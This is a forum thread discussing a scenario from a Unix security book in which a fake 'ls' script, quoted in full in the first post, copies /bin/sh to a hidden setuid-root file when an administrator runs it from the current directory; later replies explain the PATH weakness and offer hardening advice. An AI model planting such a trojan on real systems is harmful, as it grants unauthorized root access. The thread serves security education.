Page 1 of 2 12 LastLast
Results 1 to 10 of 14

Thread: unix r00t

  1. #1
    Senior Member
    Join Date
    Oct 2004
    Posts
    122

    unix r00t

    practicle unix and internet security page number 88 discusses a scenario where author needed to get someones root password who allowed him to get root access on that PC but denied to give root password for some reasons

    he writes:
    "first we create an executable shell file ls in current directory:
    #!bin/sh
    cp /bin/sh ./stuff/junk/.superdude
    chmod 4555 ./stuff/junk/.superdude
    rm -f $0
    exec /bin/ls ${1+"$@"}

    "

    ......superdude is suposed to be root
    then he tricks administrator to SU to root and get into current directory and execute ls command the fake ls file in current directory is executed as it is in the current directory.
    anyways i was just wondering if he had a root access to that PC did he really needed to do that after all it is just a trick i have heard that there is some way(not the password cracker) to get(or change unix password) provided that u have access to the system as root but don't know root password
    nobody is perfect i am nobody

  2. #2
    AO übergeek phishphreek's Avatar
    Join Date
    Jan 2002
    Posts
    4,325
    If you have access to the system as root, but don't know the root password then you can edit the /etc/shadow file to remove the encrypted password. Then you can set the password to whatever you want. This method is also used to reset the root password using single user mode at boot.

    That is why you should never stay logged in as root. You really don't need to logon as root anyway.
    Just su when you need root privledges.

    Then again, if you have physical access to a computer... the computer can always be compromised.

    Please note: I have little experience with Unix. I use Linux. Should be the same though?
    Quitmzilla is a firefox extension that gives you stats on how long you have quit smoking, how much money you\'ve saved, how much you haven\'t smoked and recent milestones. Very helpful for people who quit smoking and used to smoke at their computers... Helps out with the urges.

  3. #3
    You see they got a root shell out of it.
    . means your path, when he initiated su to root it assumed their path, the file in the directory they modified.

    I scanned the page in the book so everyone could read the whole scenario.

    http://img126.exs.cx/my.php?loc=img126&image=612.jpg

    So if you're on page 88 you've already read about some of the major flaws in UNIX.

  4. #4
    Senior Member
    Join Date
    Mar 2003
    Posts
    135
    Originally posted here by !mitationRust
    . means your path, when he initiated su to root it assumed their path, the file in the directory they modified.
    [/B]
    Just to clarify, I believe "." refers to the current directory, just like ".." refers to the directory above the current one. If this directory (.--the current one) were placed at the end of the search path variable, then the administrator would have executed the real ls command, not the doctored one, and the "trick" would not have worked. The shell just followed the path already set for it (presumably by the admin).

  5. #5
    Senior Member
    Join Date
    Feb 2004
    Posts
    373
    So if you're on page 88 you've already read about some of the major flaws in UNIX.
    I would like to hear what some of the major flaws with Unix are.

  6. #6
    Originally posted here by devpon
    I would like to hear what some of the major flaws with Unix are.
    You know, I knew I would get a response out of that, I should've left it in the dark.

    You would like to read some of the major flaws? I'm afraid I broke my stick on this dead horse awhile ago, but I'll let catch educate you on some of the flaws. *nix vs. ?, thread is not the same unless it has catch involved.
    Here
    Here
    Here

  7. #7
    Antionline Herpetologist
    Join Date
    Aug 2001
    Posts
    1,165
    That is why you should never stay logged in as root. You really don't need to logon as root anyway.
    Just su when you need root privledges.
    That is exactly why (at least with Linux and the *BSD's), most modern Unices do NOT by default put the current directory (.) in root's path variable. Otherwise, an user could copy the script to every directory he had write access to and sooner or later, root would cd to that directory and run ls.

    Cheers,
    cgkanchi
    Buy the Snakes of India book, support research and education (sorry the website has been discontinued)
    My blog: http://biology000.blogspot.com

  8. #8
    Senior Member
    Join Date
    Feb 2004
    Posts
    373
    but I'll let catch educate you on some of the flaws.
    Enough said.

  9. #9
    Senior Member
    Join Date
    Mar 2003
    Posts
    245
    Couple things to add if I may...

    Any privileged account should never have '.' or '::' in their PATH. Both of these mean `in my current dirctory'. Watch out for frequent mispellings of commands such as 'mroe', 'passwrd', etc.. And pay careful attention to what IFC is set to.

    For root, always use a shell that can set the environment variables as `read-only'. Most implementations of the Korn shell recognize 'typeset -xr VAR' to mean export the variable and set it to read-only.

    UNIX (both commercial and free systems) can be extremely secure, just make sure you don't end up making the box entirely useless in the process.

    -- spurious
    Get OpenSolaris http://www.opensolaris.org/

  10. #10
    Junior Member
    Join Date
    Feb 2004
    Posts
    12
    I just want to state, that I'm reading this book and learned a whole bunch of things and I would recommend it to anyone. Interesting discussion here
    -= ]i]There are 10 types of humans:[/i]
    o Those who understand something about binary numbers
    o And those who doesn\'t...=-

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •